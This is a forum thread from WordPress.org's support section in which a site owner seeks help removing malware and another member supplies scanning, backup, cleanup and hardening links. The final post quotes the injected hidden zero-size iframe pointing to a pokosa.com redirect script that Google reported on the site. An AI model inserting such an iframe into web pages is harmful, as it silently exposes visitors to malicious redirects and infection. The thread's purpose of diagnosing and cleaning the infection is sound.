WordPress.org

Ready to get started?Download WordPress

Forums

Malware not being removed (3 posts)

  1. timd0715
    Member
    Posted 2 years ago #

    HostGator not able to help with malware attack. Red Google warning coming up continually. Finally took the site down and will try again. Anybody with experience in removing malware?

  2. MickeyRoush
    Member
    Posted 2 years ago #

    Check your site(s) here:
    1. http://sitecheck.sucuri.net/scanner/
    2. http://www.unmaskparasites.com/
    3. http://www.virustotal.com/
    4. http://www.phishtank.com/
    5. http://www.browserdefender.com/
    6. http://ismyblogworking.com/
    7. Google Safe Browsing (to access a site's google info, add their domain to the end of this):
    http://www.google.com/safebrowsing/diagnostic?site=
    example:
    http://www.google.com/safebrowsing/diagnostic?site=example.com

    Backup everything and put that backup somewhere safe.This is in case you have problems later on. Even though you could be backing up infected files, it is more important to have a backup up of your work, for if you make a mistake cleaning your site, you will still have the backup(s).
    1. http://codex.wordpress.org/WordPress_Backups
    2. http://codex.wordpress.org/Backing_Up_Your_Database
    3. http://codex.wordpress.org/Restoring_Your_Database_From_Backup

    Then read these:
    1. http://codex.wordpress.org/FAQ_My_site_was_hacked
    2. http://wordpress.org/support/topic/268083#post-1065779
    3. http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    4. http://ottopress.com/2009/hacked-wordpress-backdoors/

    If you have indications of possible timthumb hacking, please read these:
    1. http://blog.sucuri.net/2011/08/timthumb-php-security-vulnerability-just-the-tip-of-the-iceberg.html
    2. http://markmaunder.com/2011/08/02/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/
    3. http://www.wpbeginner.com/wp-tutorials/how-to-fix-and-cleanup-the-timthumb-hack-in-wordpress/
    4. http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/

    Once your site is clean, then read this:
    1. http://codex.wordpress.org/Hardening_WordPress
    2. http://codex.wordpress.org/htaccess_for_subdirectories

  3. timd0715
    Member
    Posted 2 years ago #

    Wow - thanks very much.

    Here is what Google sent - they believe it is the Pokosa virus: They found this code, but after hours of searching, I didn't see it:

    <iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" h
    eight="0" frameborder="0">

    I will go through your links until I get to the bottom of this.

    Thanks again, Mickey!

    Tim Darnell

Topic Closed

This topic has been closed to new replies.

About this Topic